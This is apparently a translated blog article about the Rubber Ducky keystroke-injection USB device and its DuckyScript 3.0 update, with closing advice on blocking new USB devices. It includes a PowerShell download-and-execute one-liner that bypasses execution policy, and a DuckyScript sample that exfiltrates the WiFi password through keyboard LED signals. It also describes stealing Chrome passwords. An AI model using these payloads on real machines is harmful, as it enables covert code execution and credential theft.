The Rubber Ducky flash drive has become even more dangerous

rubber ducky is a well-known hacker device that has long been familiar to information security specialists (and series Mr. Robot). The first version came out over ten years ago. In appearance, an ordinary flash drive, when connected, pretends to be a USB keyboard and launches an arbitrary script. This allows unusual attacks that are difficult to detect with an antivirus.

The Rubber Ducky attack is just a sequence of keystrokes (to open the console and enter some commands in it).

For example, you can display
windows login popup.

In fact, this is the sequence of keys that are “typed” on the fake keyboard:

powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl

There are no malicious files on the flash drive. It’s just a “keyboard” on which certain buttons are simply “pressed”.

Here is another scriptwhich opens PowerShell and collects saved passwords from Chrome browser. You can save them on a flash drive or send them to the server under the guise of GET requests from the Chrome headless browser so as not to arouse suspicion from the antivirus. This is what it looks like on the victim’s computer:

That is, the attack scheme is clear:

  1. The flash drive is inserted into the computer
  2. A new USB keyboard is registered in the system
  3. A script is automatically launched for execution, which is one specific sequence of keystrokes.

Because of this limited functionality, in the past, each attack had to be carefully prepared. It was necessary to collect information about a specific computer into which a USB flash drive would be inserted: what operating system and software environment was there. Because only one specific script is written to the flash drive for execution, and in it is a hard-coded sequence of characters that are entered into the console.

But now the developer Darren Keetchen has significantly expanded the functionality of the device, so that it has become much more dangerous. Most importantly, the flash drive now supports the DuckyScript 3.0 scripting language.

DuckyScript 3.0 is a complete programming language that allows you to write normal functions, store variables, and use conditional jumps.

For example, the new Ducky can detect the operating system version (Windows or Mac), execute the appropriate code for each system, or shut down if the target doesn’t match the conditions.

Scripts can now generate pseudo-random numbers and use them to add a variable delay between keystrokes. This creates a “human effect” when entering commands in the console. The device independently bruteforces passwords and decodes hashes.

Another convenient innovation is that a flash drive can now encode passwords in binary format and transmit them over a three-bit channel by blinking the CapsLock, NumLock and ScrollLock LEDs on the keyboard.

Function Keystroke Reflection implemented on the basis scientific work 2019 (Mordechai Gury, Dima Bykhovsky and others).

Keystroke Reflection Demo and Sample Code

REM Example Simple Keystroke Reflection Attack for Windows
REM Saves currently connected wireless LAN profile to DUCKY
DELAY 2000

REM Store the currently connected WiFi SSID & Key to %tmp%\z
STRINGLN powershell "netsh wlan show profile name=(Get-NetConnectionProfile).Name key=clear|?{$_-match'SSID n|Key C'}|%{($_ -split':')[1]}>$env:tmp\z"

REM Convert the stored creds into CAPSLOCK and NUMLOCK values.
STRINGLN powershell "foreach($b in $(cat $env:tmp\z -En by)){foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){if($b-band$a){$o+='%{NUMLOCK}'}else{$o+='%{CAPSLOCK}'}}}; $o+='%{SCROLLLOCK}';echo $o >$env:tmp\z"

REM Reflect the CAPSLOCK and NUMLOCK Keystrokes back to the Ducky.
STRINGLN powershell "$o=(cat $env:tmp\z);Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait($o);rm $env:tmp\z"

REM The final SCROLLLOCK keystroke indicates EXFIL is complete.

To prepare malicious loads, an online

web IDE

, in which you can test scripts, compile and prepare for writing to a USB flash drive. In a dedicated channel

Hak5 Discord

novice hackers share tips and experience. Classes are being recruited for online courses. The official website also has

script directory

for any occasion. For example,

this script

launches a hidden console, enters Windows network properties (

control.exe /name Microsoft.NetworkAndSharingCenter

), takes a screenshot of the WiFi password (PrnScr button) and sends it to Dropbox.

In general, over the past ten years, several modifications of Rubber Ducky have been released, but recent updates dramatically expand its capabilities, so information security specialists should take this attack vector into account.

“Forgotten” flash drives

That is, you need to understand that a seemingly “forgotten” flash drive can impersonate a USB keyboard and execute arbitrary commands in the system on behalf of a logged in user. This is a fundamental vulnerability (feature) that affects all operating systems, including Windows, macOS and Linux. For protection, you can hardware or software block the connection of new devices via USB. For example, such a function supported in Qubes OS.

Similar Posts

Leave a Reply